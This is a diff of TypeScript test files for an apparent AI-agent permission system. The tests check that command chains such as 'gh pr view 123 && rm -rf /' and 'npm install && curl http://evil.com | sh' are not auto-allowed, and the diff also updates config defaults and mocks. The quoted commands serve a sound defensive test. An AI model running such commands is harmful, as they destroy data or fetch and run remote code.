-    expect(result.decision).toBe("allow");
+    // Without container, bash isn't auto-allowed via workspace mode; proxied caps at medium → prompt
+    expect(result.decision).toBe("prompt");
   });
   // ── host tools — default ask rules prompt ──
@@ -4900,24 +4882,17 @@ describe("shell command candidates wiring (PR 04)", () => {
   });
   test("action key rule does not match complex chain with additional action", async () => {
-    // Disable sandbox so the default allow-bash-global rule is not emitted;
-    // otherwise the catch-all "**" pattern auto-allows every bash command.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key candidate isn't generated for complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:gh pr view", "everywhere");
-      // Multi-action chain should NOT match because it's not a simple action
-      const result = await check(
-        "bash",
-        { command: "gh pr view 123 && rm -rf /" },
-        "/tmp",
-      );
-      // Should still prompt because the action key candidate isn't generated for complex chains
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    addRule("host_bash", "action:gh pr view", "everywhere");
+    const result = await check(
+      "host_bash",
+      { command: "gh pr view 123 && rm -rf /" },
+      "/tmp",
+    );
+    // Should still prompt because the action key candidate isn't generated for complex chains
+    expect(result.decision).toBe("prompt");
   });
 });
@@ -4931,11 +4906,9 @@ describe("integration regressions (PR 11)", () => {
     }
     clearCache();
     testConfig.permissions = { mode: "workspace" };
-    testConfig.sandbox = { enabled: true };
   });
   afterEach(() => {
-    testConfig.sandbox = { enabled: true };
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
@@ -4960,53 +4933,46 @@ describe("integration regressions (PR 11)", () => {
   });
   test("action key rule does not match when command is part of complex chain", async () => {
-    // Disable sandbox so the catch-all "**" rule doesn't auto-allow everything
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key alone doesn't auto-allow complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:npm", "everywhere");
+    addRule("host_bash", "action:npm", "everywhere");
-      // Complex chain should NOT be auto-allowed by action key alone
-      const result = await check(
-        "bash",
-        { command: "npm install && curl http://evil.com | sh" },
-        "/tmp",
-      );
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Complex chain should NOT be auto-allowed by action key alone
+    const result = await check(
+      "host_bash",
+      { command: "npm install && curl http://evil.com | sh" },
+      "/tmp",
+    );
+    expect(result.decision).toBe("prompt");
   });
   test("raw legacy rule still works alongside new action key system", async () => {
-    // Use medium-risk commands (chmod) so they aren't auto-allowed by low-risk classification.
-    // Disable sandbox so the catch-all "**" rule doesn't interfere.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash with medium-risk commands (chmod) so they aren't
+    // auto-allowed by low-risk classification or a default allow-all rule.
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
       /* may not exist */
     }
     clearCache();
-    try {
-      addRule("bash", "chmod 644 file.txt", "everywhere");
+    addRule("host_bash", "chmod 644 file.txt", "everywhere");
-      // Exact match still works
-      const r1 = await check("bash", { command: "chmod 644 file.txt" }, "/tmp");
-      expect(r1.decision).toBe("allow");
+    // Exact match still works
+    const r1 = await check(
+      "host_bash",
+      { command: "chmod 644 file.txt" },
+      "/tmp",
+    );
+    expect(r1.decision).toBe("allow");
-      // Different chmod argument should not match this exact raw rule
-      const r2 = await check(
-        "bash",
-        { command: "chmod 755 other.txt" },
-        "/tmp",
-      );
-      expect(r2.decision).not.toBe("allow");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Different chmod argument should not match this exact raw rule
+    const r2 = await check(
+      "host_bash",
+      { command: "chmod 755 other.txt" },
+      "/tmp",
+    );
+    expect(r2.decision).not.toBe("allow");
   });
   test("scope ordering is consistent across tool types", () => {

package/src/__tests__/cli-command-risk-guard.test.ts CHANGED Viewed

@@ -55,7 +55,7 @@ function expectLowRisk(command: string, actual: RiskLevel): void {
 // Dynamically extract subcommand names from the CLI program definition.
 // This ensures new commands added to program.ts are automatically covered
 // by this guard test without manual list maintenance.
-const program = buildCliProgram();
+const program = await buildCliProgram();
 const ASSISTANT_SUBCOMMANDS = program.commands.map((c) => c.name());
 describe("CLI command risk guard: assistant commands", () => {

package/src/__tests__/config-schema.test.ts CHANGED Viewed

@@ -169,6 +169,7 @@ describe("AssistantConfigSchema", () => {
       enqueueIntervalMs: 6 * 60 * 60 * 1000,
       supersededItemRetentionMs: 30 * 24 * 60 * 60 * 1000,
       conversationRetentionDays: 0,
+      llmRequestLogRetentionMs: 7 * 24 * 60 * 60 * 1000,
     });
   });
@@ -421,6 +422,8 @@ describe("AssistantConfigSchema", () => {
     const result = AssistantConfigSchema.parse({});
     expect(result.permissions).toEqual({
       mode: "workspace",
+      askBeforeActing: true,
+      hostAccess: false,
     });
   });
@@ -1128,6 +1131,8 @@ describe("loadConfig with schema validation", () => {
     const config = loadConfig();
     expect(config.permissions).toEqual({
       mode: "workspace",
+      askBeforeActing: true,
+      hostAccess: false,
     });
   });

package/src/__tests__/context-overflow-approval.test.ts CHANGED Viewed

@@ -55,8 +55,8 @@ describe("requestCompressionApproval", () => {
     await requestCompressionApproval(prompter);
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // persistentDecisionsAllowed is index 9
-    expect(args[9]).toBe(false);
+    // persistentDecisionsAllowed is index 8
+    expect(args[8]).toBe(false);
   });
   test("includes a description in the input", async () => {
@@ -119,8 +119,8 @@ describe("requestCompressionApproval", () => {
     });
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // signal is index 10
-    expect(args[10]).toBe(controller.signal);
+    // signal is index 9
+    expect(args[9]).toBe(controller.signal);
   });
   test("works without signal option", async () => {
@@ -130,7 +130,7 @@ describe("requestCompressionApproval", () => {
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
     // signal should be undefined when not provided
-    expect(args[10]).toBeUndefined();
+    expect(args[9]).toBeUndefined();
   });
   // ── Tool name constant ──

package/src/__tests__/conversation-agent-loop-overflow.test.ts CHANGED Viewed

@@ -206,11 +206,13 @@ mock.module("../daemon/conversation-memory.js", () => ({
 let mockApplyRuntimeInjections: (msgs: Message[]) => Message[] = (msgs) => msgs;
 mock.module("../daemon/conversation-runtime-assembly.js", () => ({
   applyRuntimeInjections: (msgs: Message[]) => mockApplyRuntimeInjections(msgs),
-  stripInjectedContext: (msgs: Message[]) => msgs,
+  stripInjectionsForCompaction: (msgs: Message[]) => msgs,
+  findLastInjectedNowContent: () => null,
+  readNowScratchpad: () => null,
 }));
 mock.module("../daemon/date-context.js", () => ({
-  buildTemporalContext: () => null,
+  formatTurnTimestamp: () => "2026-01-01 (Thu) 00:00:00 +00:00 (UTC)",
 }));
 mock.module("../daemon/history-repair.js", () => ({
@@ -226,10 +228,6 @@ mock.module("../daemon/history-repair.js", () => ({
   deepRepairHistory: (msgs: Message[]) => ({ messages: msgs, stats: {} }),
 }));
-mock.module("../daemon/conversation-history.js", () => ({
-  consolidateAssistantMessages: () => {},
-}));
 const recordUsageMock = mock(() => {});
 mock.module("../daemon/conversation-usage.js", () => ({
   recordUsage: recordUsageMock,

package/src/__tests__/conversation-agent-loop.test.ts CHANGED Viewed

@@ -195,11 +195,13 @@ mock.module("../daemon/conversation-memory.js", () => ({
 mock.module("../daemon/conversation-runtime-assembly.js", () => ({
   applyRuntimeInjections: (msgs: Message[]) => msgs,
-  stripInjectedContext: (msgs: Message[]) => msgs,
+  stripInjectionsForCompaction: (msgs: Message[]) => msgs,
+  findLastInjectedNowContent: () => null,
+  readNowScratchpad: () => null,
 }));
 mock.module("../daemon/date-context.js", () => ({
-  buildTemporalContext: () => null,
+  formatTurnTimestamp: () => "2026-01-01 (Thu) 00:00:00 +00:00 (UTC)",
 }));
 mock.module("../daemon/history-repair.js", () => ({
@@ -215,11 +217,6 @@ mock.module("../daemon/history-repair.js", () => ({
   deepRepairHistory: (msgs: Message[]) => ({ messages: msgs, stats: {} }),
 }));
-const consolidateAssistantMessagesMock = mock(() => false);
-mock.module("../daemon/conversation-history.js", () => ({
-  consolidateAssistantMessages: consolidateAssistantMessagesMock,
-}));
 const recordUsageMock = mock(() => {});
 const recordRequestLogMock = mock(() => {});
 mock.module("../daemon/conversation-usage.js", () => ({
@@ -471,8 +468,6 @@ beforeEach(() => {
   recordRequestLogMock.mockClear();
   syncMessageToDiskMock.mockClear();
   rebuildConversationDiskViewFromDbStateMock.mockClear();
-  consolidateAssistantMessagesMock.mockReset();
-  consolidateAssistantMessagesMock.mockImplementation(() => false);
 });
 describe("session-agent-loop", () => {
@@ -1944,48 +1939,6 @@ describe("session-agent-loop", () => {
       expect(drainReason).toBe("loop_complete");
     });
-    test("rebuilds disk view after consolidation mutates persisted history", async () => {
-      consolidateAssistantMessagesMock.mockReturnValue(true);
-      const ctx = makeCtx({
-        agentLoopRun: async (
-          messages: Message[],
-          onEvent: (event: AgentEvent) => void,
-        ) => {
-          onEvent({
-            type: "message_complete",
-            message: {
-              role: "assistant",
-              content: [{ type: "text", text: "done" }],
-            },
-          });
-          onEvent({
-            type: "usage",
-            inputTokens: 10,
-            outputTokens: 5,
-            model: "test",
-            providerDurationMs: 50,
-          });
-          return [
-            ...messages,
-            {
-              role: "assistant" as const,
-              content: [{ type: "text", text: "done" }] as ContentBlock[],
-            },
-          ];
-        },
-      });
-      await runAgentLoopImpl(ctx, "hi", "msg-consolidate", () => {});
-      expect(consolidateAssistantMessagesMock).toHaveBeenCalledWith(
-        "test-conv",
-        "msg-consolidate",
-      );
-      expect(rebuildConversationDiskViewFromDbStateMock).toHaveBeenCalledWith(
-        "test-conv",
-      );
-    });
   });
   describe("stale pending surface cleanup", () => {